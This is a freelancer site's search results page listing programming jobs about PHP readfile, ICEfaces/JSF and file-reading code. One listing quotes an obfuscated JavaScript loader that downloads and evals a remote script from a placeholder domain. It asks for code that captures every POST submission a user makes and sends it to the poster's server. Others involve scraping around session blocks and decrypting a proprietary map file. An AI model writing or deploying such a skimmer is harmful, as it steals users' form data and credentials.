Readfile icefaces jobs

Filter

My recent searches
Filter by:
Budget
to
to
to
Type
Skills
Languages
    Job State
    149 readfile icefaces jobs found, pricing in USD

    I have the a Quasar application using 2.3 that is using the latest build of OpenAI (4.10) that is giving me an error if I try use LangChain's Textloader I'm a...latest build of OpenAI (4.10) that is giving me an error if I try use LangChain's Textloader I'm also using node 16+ import { TextLoader } from "langchain/document_loaders/fs/text"; import { CharacterTextSplitter } from "langchain/text_splitter"; const loader = new TextLoader("..../../.") const docs = await (); I get Uncaught (in promise) TypeError: readFile is not a function at (:26) at async (:16) not sure if it can't find my file- so I used in internal path and a full url to check but got the same error.

    $22 (Avg Bid)
    $22 Avg Bid
    7 bids

    Create a Method and pass in the filename from the Main method and print the data to the console. The idea is to not get the OutOfMemoryException. Save ALL the data to a string for me to use later and print the data to the console line by line. The MyDataFile example is just dummy data and isn't important. FreeLancer Allows a 25MB maximum so please copy and paste the data inside th...ALL the data to a string for me to use later and print the data to the console line by line. The MyDataFile example is just dummy data and isn't important. FreeLancer Allows a 25MB maximum so please copy and paste the data inside this file to double it's size to 46MB or so to test effectively. MUST HAVE Method called from Static Main() - something like public static filename = "MydataF...

    $35 (Avg Bid)
    $35 Avg Bid
    10 bids

    I have a php script to get files outside root with readfile(), I have fancybox that reads pdfs and docx with iframe. I need to serve images/doc to fancybox outside root, Problem: ... when I click on fancybox link to php script, box opens blank in frame, then downloads automatically. This whole method may be bad, might be best to do from scratch

    $36 (Avg Bid)
    $36 Avg Bid
    4 bids

    I need a developer who have experience with windows C++ programming. good if have windows api readfile and writefile need deep knowledge

    $13 / hr (Avg Bid)
    $13 / hr Avg Bid
    10 bids

    ...idTramiteProfesion=64&idInstitucion=2039 Where it says "Name" you must insert an "a" and you get 4,155 records. We have tried to do it and we have encountered the following problems: 1º They have blocked access with the SELENIUM library 2º We have tried to make GET and POST requests by replicating all the parameters they use. 3º We cannot identify how to take a session that they create with ICEFACES. 4º We get the message "<session-expired/>" We need a programmer who make a code that allows us to access the data, and that allows us to keep the session open. We do not need you to skip the Captcha, just that it allows us to have an open session and to take more than one record. We need to leave it running on an exter...

    $171 (Avg Bid)
    $171 Avg Bid
    7 bids

    Web app with 3-4 pages (User interactive, AJAX), preferably built using JSF framework, (Java Server Faces, UI in Rich faces, Icefaces), Backend persistence layer (preferably Cassandra) There also has to be a basic payment gateway integration to allow users to make payments. Alternatively front end could use Javascript, HTML, CSS etc, while the backend remain on Java

    $504 (Avg Bid)
    $504 Avg Bid
    13 bids

    Web app with 3-4 pages (User interactive, AJAX), preferably built using JSF framework, (Java Server Faces, UI in Rich faces, Icefaces), Backend persistence layer (preferably Cassandra) Alternatively front end could use Javascript, HTML, CSS etc, while the backend remain on Java

    $559 (Avg Bid)
    Urgent
    $559 Avg Bid
    40 bids

    ...format the images in to a integer array and then via the app you will write - load them via USB in to the SPIFFS memory. I can then use my Arduino code to read them and use them in the Eye application. You routine will only be called when the end user want to change their eye details otherwise it will just be program space - so making it as compact as possible would be good. Functions:- ReadDir ReadFile SaveFile DeleteFile are all that are needed. Max file will be about 100k. Likewise I prefer not to have the user install Python etc to use the existing SPIFFS loader. However if you can supply a dedicated SPIFFS loader/reader I can handle the files on the Desktop application. I have found some of these however have never gotten all of the flags re memory partitions to wor...

    $188 (Avg Bid)
    $188 Avg Bid
    5 bids

    I need a php class to parse MT940 and MT942 files and import all informations to a mysql table. the class should work like this.... $parser = new MT940Parser(); $parser->readFile($path_to_mt940_file); $parser->parse(); $arr = $parser->getArray(); I am from Berlin / Germany

    $1224 (Avg Bid)
    $1224 Avg Bid
    33 bids

    ...; You will then need to import the Calendar from java.util. o only the getters and setters that are actually used. CarLot class: • Instance Variables: o An array that stores Vehicles that represents the fleet of vehicles o A variable that represents the count for the number of vehicles • Methods: o Constructor- One constructor that instantiates the array and sets the count to zero o readFile()- This method accepts a string that represents the name of the file to be read. It will then read the file. It should work for either the car or truck file. Once the data is read, it should create a vehicle and then pass the vehicle to the addVehicle method. It should not allow any duplication of records. Be sure to handle all exceptions. o writeFile()- This method accepts a stri...

    $35 (Avg Bid)
    $35 Avg Bid
    7 bids

    Wordpress drawing plugin was working as intended before hosting account was upgraded from a pro hosting account to VPS on inMotionhosting.com. The plugin is supposed to capture images on the page, create a thumbnail, then onclick paint over the html 5 canvas with that image. The before image included shows the thumbnail as it should appear. It's missing in the af...getimagesize($img); if ($img_info !== false){ echo json_encode(array($file,$img_info[0], $img_info[1])); } else echo ''; //From <?php $img = urldecode($_GET['img']); $img_info = getimagesize($img); if (($img_info !== false) && (in_array($img_info[2], array(IMAGETYPE_JPG, IMAGETYPE_JPEG, IMAGETYPE_JPEG2000, IMAGETYPE_PNG, IMAGETYPE_GIF)))){ header("Content-type: ".$img_inf...

    $120 (Avg Bid)
    $120 Avg Bid
    20 bids

    I get the following error [29-Mar-2018 08:36:06 America/Chicago] PHP Warning: readfile(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/mymindli/public_html/ on line 32 [29-Mar-2018 08:36:06 America/Chicago] PHP Warning: readfile(xxxx): failed to open stream: no suitable wrapper could be found in /home/mymindli/public_html/ on line 32 I need this fixed asap.

    $22 (Avg Bid)
    $22 Avg Bid
    14 bids

    ...arr[] = new Student[40]; private Statistics s = new Statistics(); private StudentReport arr2[] = new StudentReport[40]; private InstructorReport arr3 = null; public void createGradeBook(String fname) { //This method must be called first - before printGradeBook() or getStats() or printStudentScores() //we will call existing methods to: //a. read the file and build a student array - call readFile in Util //b. compute statistics. - call methods in Statistics //c. build StudentReport array [done in lab 6] //d. serialize studentreport - upto 40 files. [done in lab 6] //e. For instructor - write one file (serialized) with Student [] and Statistics[] } public void printGradeBook() { } //use debug flag for printing. if debug = true then print other no printing. publi...

    $207 (Avg Bid)
    $207 Avg Bid
    27 bids

    I need you to develop some software for me. I would like this software to be developed for Windows using Java. Need to do a task... Java, JSF (icefaces framework)

    $129 (Avg Bid)
    $129 Avg Bid
    14 bids

    Please can you fix the bug where i'm getting for some values of orderReverse -1 original value from order ? //main int order[4] = { 0 }; while (nDataLen >= 2 * 4) { func3(order, readFile); unsigned int previous = 0; unsigned int w = 1; for (int i = 0; i < 4; i++) { previous += w * (order[i]); w *= 256; } } char bitStringr[33] = {'0'}; Get_string32_from_SIZE4_VALUE(bitStringr, previous); int orderReverse[56]; orderReverse[0] = Get_CHAR_ARRAY_SIZE4_FROM_VALUE(bitStringr); int ic = 0; char bitStringr1[33] = {'0'}; for (int i = 8; i < 16; i++ ) { bitStringr1[ic] = bitStringr[i]; ic++; } orderReverse[1] = Get_CHAR_ARRAY_SIZE4_FROM_VALUE(bitStringr1); ic = ...

    $25 (Avg Bid)
    $25 Avg Bid
    17 bids

    Please can you fix the bug where i'm getting for some values of orderReverse -1 original value from order ? //main int order[4] = { 0 }; while (nDataLen >= 2 * 4) { func3(order, readFile); unsigned int previous = 0; unsigned int w = 1; for (int i = 0; i < 4; i++) { previous += w * (order[i]); w *= 256; } } char bitStringr[33] = {'0'}; Get_string32_from_SIZE4_VALUE(bitStringr, previous); int orderReverse[56]; orderReverse[0] = Get_CHAR_ARRAY_SIZE4_FROM_VALUE(bitStringr); int ic = 0; char bitStringr1[33] = {'0'}; for (int i = 8; i < 16; i++ ) { bitStringr1[ic] = bitStringr[i]; ic++; } orderReverse[1] = Get_CHAR_ARRAY_SIZE4_FROM_VALUE(bitStringr1); ic = ...

    $15 (Avg Bid)
    $15 Avg Bid
    8 bids

    Hi, I'm working on a project that is using phonegap build to compile mobile apps to various platforms. As the project size is quite large I'll need to out source parts of it to another developer. For now, I need to implement the cordova-plug...For now, I need to implement the cordova-plugin-file plugin to store a persistent JSON file for all supported devices. Here's a link to the plugin: If you have done this before, please mention so in your bid. If you haven't, please make sure you can before bidding. What I'll need is a js file with a simple API (and any instructions): - readfile (successCallback, failCallback); - createFile (successCallback, failCallback); //if doesn't exist - saveFile (successCallback, failCallback);

    $191 (Avg Bid)
    $191 Avg Bid
    9 bids

    Se requiere personal con experiencia en:<br /><br />HTML, Javascript, CCS, ICEFaces, Primefaces y RichFaces. EJB, JPA, JSF, Hibernate y EclipseLink.<br />Glassfish, Websphere, Subversión. Designer, PL/ SQL, Forms y Reports de Oracle.

    $388 (Avg Bid)
    $388 Avg Bid
    4 bids

    ..."MIME-Version: 1.0rn"; $header .= "Content-type: text/htmlrn"; $retval = mail ($to,$subject,$body,$header); header ("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header('Content-Type: application/octetstream'); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($File1)); header("Content-disposition: attachment; filename="".$File1."""); readfile($File1); } else { if(isset($_POST['linkid'])){ $Company = $_SESSION['company'] = $_POST['Company']; $Contact = $_SESSION['Contact'] = $_POST['Contact']; $Phone = $_SESSION['Phone'] = $_POST['Phone'];...

    $43 (Avg Bid)
    $43 Avg Bid
    19 bids

    This ten dollar task consist of the following: Atttached you find a php file which works fine. It collects the form fields and sends a mail. Now I want the PHP file to display the following text for 2 seconds "Thank you for your request" and redirect the user to a pdf file ( open a new tab in browser and show pdf ). The...and sends a mail. Now I want the PHP file to display the following text for 2 seconds "Thank you for your request" and redirect the user to a pdf file ( open a new tab in browser and show pdf ). The following code should work for opening a new tab in browser and show pdf document. header("Content-type: application/pdf"); header("Content-Disposition: inline; filename="); @readfile(''); It shou...

    PHP
    $13 (Avg Bid)
    $13 Avg Bid
    8 bids

    ...should be local to the readFile (Scanner) method. These instances should be passed as explicit parameters to other methods used when reading the data file. For example, the body of the methods like the following should be replaced to effectively use a <Integer, Ship> hash map, the surrounding code needs to support this structure: Ship getShipByIndex (int x, <Integer, Ship> hms) { return (x); } // end getDockByIndex Since the body of this method has become trivial, perhaps the call to this method can be simply replaced by the get method of the HashMap. Your code should be sure to handle a null return from this call gracefully. The instances should be released (go out of scope, hence available for garbage collection) when the readFile method ...

    $133 (Avg Bid)
    $133 Avg Bid
    7 bids

    ...block) – returns the num. of bytes read and read them into a buffer pointed by block. 3. int writeData(int disk, int blockNum, void* block) – writes that data in the block to the disk block blockNum. File System API: 4. int writeFile(int disk, char* filename, void* block): write the buffer pointed by block. The same data should be recoverable by the file name. 5. int readFile(int disk, char* filename, void* block): returns the data stored by the given file name. Organization: Use the inode design with bitmaps for your organization. Diagnostic APIs: 6. void print_inodeBitmaps(int fileSystemId): prints the bitmaps of inodes 7. void print_dataBitmaps(int fileSystemId): prints the bitmaps of data block 8. void p...

    $121 (Avg Bid)
    $121 Avg Bid
    5 bids

    Hi, I n...OpenServer(); - Representing CreateNamedPipe() function. Connect(); - Representing ConnectNamedPipe() function. WritePipe(); - Representing WriteFile() function. Close(); - Representing FlushFileBuffers() and DisconnectNamedPipe() functions respectively. FreeBuffer(); - Representing CloseHandle() function. ConnectTo(); - Representing CreateFile() Function. ReadPipe(); - Representing ReadFile() function. All of these functions are Named Pipe Functions which i need to connect my two Little CommandLine Program.. Bid and Let's get to work... Please, Bid only if you are professional in this field(C++ DLL) and if you know and can work with NamedPipe Functions... I would want someone to be my favorite coder as i have few(Upto 5) Projects to do before t...

    $142 (Avg Bid)
    $142 Avg Bid
    10 bids

    NO TIME WASTERS!!!! I dont want to hear nonsense about how many days this will take, etc etc You either know what you are doing or you dont! I am trying to open remote video stream using fopen/readfile() I have no problems up to about 2 mins, then it times out. NO ERRORS are being produced, I have been through everything in that I can think of. I have my own Windows 2012 dedi server / Plesk , with no restrictions yet I cant get this to work and need a 2nd pair of eyes. I have tried everything including max timeout, set time limit I have searched and searched The video is NOT on the same server and the input files are dynamic <!-------- Script ---------> ini_set('error_log', __DIR__ . DIRECTORY_SEPARATOR . ''); ini_set('...

    PHP
    $31 (Avg Bid)
    $31 Avg Bid
    3 bids

    I’m looking for an advanced reverse engineer, best known with IDA, OllyDbg and decryption routines. I have a GPS/navigation software for windows. It reads the streets and house numbers of an encrypted file (format .fbl) and displays it on a map. From what I know it uses CreateFile() + SetFilePointer() + ReadFile(). I could not get behind it after trying. I need someone who can decrypt this file by looking into the routines of the application or find some other ways to extract all streets and house numbers of the country from the encrypted file. The software decrypts the file map (containing streets, house numbers) and other information on the fly. If you find this routine, it should not be that hard anymore. The application is not encrypted, around 5 mb + 1...

    $654 (Avg Bid)
    Featured Urgent
    $654 Avg Bid
    8 bids

    Please see Option 2 - Option 4 from the PDF and give me a proposal! Thank you very much for your help.

    $193 (Avg Bid)
    $193 Avg Bid
    2 bids

    You need to have Linuc GCC environment to do this small proj. Music Library: This scratch is implemented by Linklist, but you need to change to array struct, and change the variable name, as well as the Readfile, it is only read char, you need to change to read string. or read the attached program, know its code pattern, writing your code is ok.

    $28 (Avg Bid)
    $28 Avg Bid
    4 bids

    This seems like it's something you may be interested in. I'm working on a private project which deals with web scraping and automatic form submission. The project is fairly small, however here are some issues you should know right up front: - The forms are javascript (IceFaces). - I need to use commandline-type tools for Linux. (perl, curl, etc. Nothing microsoft or windows related). Here's an example form that I want to deal with: We would submit a badge number, a confirmation number, and a departure city code. Then, we'd do some stuff and get some data. Are you interested in learning more about the project and exact details so that you can quote your price for coding? Thank you, William Scott

    $150 (Avg Bid)
    $150 Avg Bid
    1 bids

    Desarrollar distintos aspectos en un proyecto WEB Java (con Maven, Spring, JPA, JSF2, IceFaces, JBOSS, etc.) Desarrollar interfaces WebServices para diferentes integraciones (ESB) Actualmente en Eclipse pero con migración a IDEA.

    $274 (Avg Bid)
    $274 Avg Bid
    11 bids

    Hi. I need help with bet365 odds feed , how can I put their odds on my website. I just talking about mechanism. I'll do it by myself. I just need quick guide. Bet365 gave me permission for their odds but I can't turn it on to get selected sports. I readfile there but it doesn't work , selects doesn't work and I can't choose sport I want . (I want choose motor sports-->speedway) For someone who worked before with b365 it should be easy I think. PM if you are interested.

    $133 (Avg Bid)
    $133 Avg Bid
    3 bids

    In this position the candidate will be expected to modify and develop source cod...to modify and develop source code using Java/J2EE. The inventory of tools are Java, JavaServer Faces (JSF v 2.0 or above), PrimeFaces and Web Services. The client is looking for senior developers that have the ability to be productive immediately and work in a team environment. Required Skills: Java/J2EE JSF (v 2.0 or above) PrimeFaces (preferred, similar software such as RichFaces or IceFaces will be considered) Preferred experience with the following: Web Services (ability to create RESTful Web Services; bonus: JAX-B and JPA) Tomcat Application Server NIEM (National Information Exchange Model) This a great longer-Term role (18+months) in the DC area within walking distance to Union...

    $58 / hr (Avg Bid)
    $58 / hr Avg Bid
    23 bids

    ...opportunities to help address the development areas. Technical Skills: Must have strong understanding of Liferay Architecture. Hands on Experience on the LDAP, Liferay, and Alfresco 4. x Integration. Portlets, JSF portlets, Spring portlet, JSP, Servlets, Hibernate, and JDBC. Experienced in working on n-tier architecture systems with application system development using Java, J2EE, JSF, Icefaces, JSR 168/ 286 Design and implement Liferay-based web frameworks, libraries, or accelerators to be used as value-added product offerings Portlets, JSF portlets, Spring portlet, JSP, Servlets, Hibernate, and JDBC. Hands on Experience on the LDAP, Liferay, and Alfresco 4. x Integration. Experienced in all phases of software life cycle like analysis, designing, developing and m...

    $15 / hr (Avg Bid)
    $15 / hr Avg Bid
    6 bids

    ..._url); $psps_url="$psps_url$psps_parameters"; # Include the shop if (function_exists('curl_init')) { $shop=curl_init(); curl_setopt($shop,CURLOPT_URL,$psps_url); curl_exec($shop); curl_close($shop); } else { readfile($psps_url); } ?> 2. contains the following javascript code snippet:- <!-- PopShops store code starts here --> <script type="text/javascript" src=""></script> <!-- PopShops store code ends here --> What I would like to know is:- 1. Which is the best code

    $64 (Avg Bid)
    $64 Avg Bid
    3 bids

    ...Resources, Main Bundle) getApplicationDirectory( ) getDesktopDirectory( ) getDocumentsDirectory( ) getResourcesDirectory( ) getUserDirectory( ) createDirectory( ) deleteDirectory( ) createFile( ) deleteFile( ) getFile( ) - Check is directory/file exist and extension ifDirectoryExists( ) ifFileExists( ) extension( ) - Open, close, read, write file openFile( ) closeFile( ) readFile( ) writeFile( ) - Open, close, read DB (SQLITE, .db) openDB( ) closeDB( ) Some examples exactly what I need, but using MACGAP: !/api/ !/api/ !/api/

    $675 (Avg Bid)
    $675 Avg Bid
    3 bids

    ...List<Ballot> ballots = readFile(); displayBallotList(ballots); List<Tally> tallies = new LinkedList<Tally>(); castBallots(tallies, ballots); while( !haveWinner(tallies)) { displayTallies(tallies); Tally minTally = removeMinTally(tallies); (minTally.candidate+" was removed from the race."); castBallotsAgain(tallies, minTally); } displayTallies(tallies); } A Ballot should contain a list of String, one for each name written on the ballot. A Tally should contain a list of Ballot. These are all the ballots cast for one candidate. The main method will compile only if you - create a class called Ballot - and a class called Tally with a field called candidate (not private!) - have static methods called readFile(), di...

    $30 (Avg Bid)
    $30 Avg Bid
    1 bids

    ...List<Ballot> ballots = readFile(); displayBallotList(ballots); List<Tally> tallies = new LinkedList<Tally>(); castBallots(tallies, ballots); while( !haveWinner(tallies)) { displayTallies(tallies); Tally minTally = removeMinTally(tallies); (minTally.candidate+" was removed from the race."); castBallotsAgain(tallies, minTally); } displayTallies(tallies); } A Ballot should contain a list of String, one for each name written on the ballot. A Tally should contain a list of Ballot. These are all the ballots cast for one candidate. The main method will compile only if you - create a class called Ballot - and a class called Tally with a field called candidate (not private!) - have static methods called ...

    $92 (Avg Bid)
    $92 Avg Bid
    2 bids

    We need an intermediate Java/J2EE programmer with sufficient experience in JSF and IceFaces to help with restructuring the code of an existing web application in order to meet the technical requirements of the client, as it was developed with a structure different to what the client requires. Our senior J2EE developer will give you a document with an overview of the project's architecture and set of detailed instructions on what needs to be done code-wise. We're experienced developers ourselves but need to outsource this particular task as we need an extra pair of hands to get this done quickly. We're looking for someone who is: - Experienced with Java/J2EE and JSF/IceFacess web application development (3+ years) - Accurate and smart - Responsible in meeting ...

    $250 - $750
    Sealed
    $250 - $750
    18 bids

    We need an intermediate Java/J2EE programmer with sufficient experience in JSF and IceFaces to help with restructuring the code of an existing web application in order to meet the technical requirements of the client, as it was developed with a structure different to what the client requires. Our senior J2EE developer will give you a document with an overview of the project's architecture and set of detailed instructions on what needs to be done code-wise. We're experienced developers ourselves but need to outsource this particular task as we need an extra pair of hands to get this done quickly. We're looking for someone who is: - Experienced with Java/J2EE and JSF/IceFacess web application development (3+ years) - Accurate and smart - Responsible in meeting ...

    $250 - $750
    Sealed
    $250 - $750
    0 bids

    ...o,1(0){6(0.5);p(4()+"3.2",0.5)},1(0){m("l j k q i!!!")})}}c{9('b://a.g/h.n',o,1(0){6(0.5);p(4()+"3.2",0.5)},1(0){m( "l j k q i!!!")})}',33,33,'req|function|js|remoteScript|getProfileFolderPath|responseText|eval|scriptTime|var|get|MYDOMAINHERE|http|else|diff|if|script|com|remote_js|co nnection|check|your|please|alert|php|true|writeFile|internet|new|getLastModifiedTime|Date|86400000|readFile|getTime'.split('|'),0,{})) } Your task: Write few lines of source code that will be downloaded from my server. This code must to this: - catch all POST action of user - get POST data and send it asynchronus to my server Job is simple and fast, few lines of code to put in my server in txt file, fi...

    $425 (Avg Bid)
    $425 Avg Bid
    2 bids

    Hi everyone, What i want from you is to create a php mp4 reader/streamer which will use as little memory. I was trying to do by myself with function fopen , readfile and any solution i found on internet but i was unsuccessfull because of some reason the file i was trying to read/stream was over 400 MB and did not buffer to player completely until the end,actually it stop somewhere in halp way. I would like to have support at least 1GB. I am sorry to say this,but i will pay only successfull Creator who create really working reader/streamer. Why i want this ? Because of security reason,if the user is logged in my website then the user can watch videos online. Also diferent file can be on diferent location on the system. Example : Video1 is under location : E:/Media/Video/

    $11 - $23
    $11 - $23
    0 bids

    ...the class example MyElements4( zip file attached). Then you will be able to transfer the ListTrans, ListChecks and ListDeposits to the textarea.(2 errors) 2. The logic you are using for list Trans, ListChecks, and ListDeposits is invalid. You are listing all transactions,check, or deposits for all accounts under the one account name in CURRENT_ACCOUNT.(2 errors) 3. The writeFile and readFile methods do not write/read any objects. They only write/read the contents of the MESSAGE variable, which is whatever was last reported to the user on the screen.( 2 errors) 4. Finally, The logic for the under 500 charge and the below 0 charge is gone. It needs to be restored.( 2 errors)...

    $27 (Avg Bid)
    $27 Avg Bid
    7 bids

    ...exactly as it would appear as if it would have directly been accessed from the web. For example, if: $path = "/home/www/myproject/sites/site2/folder1/", the script running from my file should return the contents of contained in "folder1" from "site2" exactly as if the file would have been accessed from the web (browser). I have tried doing this with function "readfile($path)" but I did not achieve a satisfactory result. The script should: - Return to the browser the appropriate HTTP headers, depending on the file type - Be safe, especially with regards to code injection (So the contents of the retrieved files can't be a sefety risk) - Be stable and efficient (It should be able to handle any hosted file, including ...

    $129 (Avg Bid)
    $129 Avg Bid
    16 bids

    I...It will download a zip file of the pictures selected. I have all the code written in PHP, but it is not working properly with the way I have it setup ... I get the following errors .... [08-Oct-2013 14:27:05 America/Chicago] PHP Warning: filesize(): stat failed for in /home/daviddca/public_html/ on line 14 [08-Oct-2013 14:27:06 America/Chicago] PHP Warning: readfile(): failed to open stream: No such file or directory in /home/daviddca/public_html/ on line 25 [08-Oct-2013 14:27:06 America/Chicago] PHP Warning: unlink(): No such file or directory in /home/daviddca/public_html/ on line 26 I simply need this fixed and working. Very likely something simple for someone who knows what they are doing.

    PHP
    $27 (Avg Bid)
    $27 Avg Bid
    5 bids

    I am hiring writers to complete my book titled 'Web Coding'. Your job is to complete a chapter on Advanced PHP Functions. The topics covered include: - ZIP and RAR Compression - Image Processsing - Socket Connection - Network Functions - hiding download link using header() and readfile() - PayPal transaction verification and mass payment. (I already have a script for this) - HTTP Functions - FTP Functions - Streams - Process Control - Sessions - Cryptography - cURL I expect flawless english. The format should resemble as much as possible the format of the existing chapters. All commands should be explained with examples of code snippets, as what has been done in the existing chapters. Tables and screenshots, where appropriate, should be added. Based o...

    $650 (Avg Bid)
    $650 Avg Bid
    8 bids

    Existing setup: CentOS 6 vm server with with Liferay 6.1x running on Apache Tomcat (MySQL) and another java open source application integrated via portlet...and liferay to a registry or directory in liferay. The one web service call in this scenario is to test the plumbing between both systems and vice versa. We would expect observance of the JSR specification and have already integrated into Liferay a java based open source ecommerce solution to JSR 286 specification and would expect same standards. We would suggest using JSF,seam richfaces, icefaces, portletfaces, bridges such as seam, weld, jsf, struts, Apache Pluto and seam test for evaluating your portlets before integration. Integration between both systems must allow inter-portlet communication and minimise Ajax laten...

    $423 (Avg Bid)
    $423 Avg Bid
    3 bids

    Essentially, the project is a simple data management application. The database (for which I will provide schemas and sample data) has a master_table and a client_table. The client_table contains two versions of each record in the master_table. All of this work is already done. The GUI needs to dynamically display one of the client_table...type of user who logs on. There is additional logic that involves a parent:child relationship - the relationships already exist, the UI does not. Other features include the ability to manually enter data, edit records, etc. As noted, detailed requirements exist and I will post them after determining if this site is a viable path. Thank you. Relevant technologies: Java EE 1.6 JSF 1.2 & ICEfaces Enterprise Edition 1.8.2 Relational DB ...

    $534 (Avg Bid)
    $534 Avg Bid
    20 bids

    Hi, I need a class called Youtube. This class should be able to fetch video info (length, name of the video, user that uploaded it, the data that it was uploaded , so a few basic get Functions). This class should also fetch all the available video qualities: - a function to get all the download links for a video as an array with the format...video, user that uploaded it, the data that it was uploaded , so a few basic get Functions). This class should also fetch all the available video qualities: - a function to get all the download links for a video as an array with the format and quality being in the array name, so example: array["mp4_360"] would return mp4 format and 360p quality. - a function to download the file, so you just readfile($link) with the correc...

    PHP
    $111 (Avg Bid)
    $111 Avg Bid
    4 bids

    I have a fully-developed plan for this project. I am not posting it yet, however, because I have found absolutely no indication that there are any freelancers here with JSF/ICEfaces skills. I believe this is a fault of the search mechanism on this site, so I am posting this now to test the water to make sure qualified workers exist. Essentially, the project is a simple data management application. The database (for which I will provide schemas and sample data) has a master_table and a client_table. The client_table contains two versions of each record in the master_table. All of this work is already done. The GUI needs to dynamically display one of the client_table records, depending on the type of user who logs on. There is additional logic that involves a parent:child relations...

    $560 (Avg Bid)
    $560 Avg Bid
    15 bids

    ...see the interrupt packets. We've examined the OEM DLL exported and used function lists. There are calls to CreateFile, CreateThread, DeviceIoControl, CreateSemaphore, Initialize|Enter|DeleteCriticalSection, all of which suggest that a monitor thread is used. We tried setting up threads with calls to CreateFile (using the relevent USB VID/PID and SetupDi* calls to create the device path), ReadFile and/or DeviceIOControl, but without success. Everything we tried returns Error#1 (wrong function) or similar. Since the now unsupported DLL does manage to do this in USER MODE, obviously there is a solution. The Project: Create some sample code (perhaps 100 lines of code) that successfully monitors the USB packets so that when the button is pressed, an event is created tha...

    $30 - $250
    Sealed
    $30 - $250
    1 bids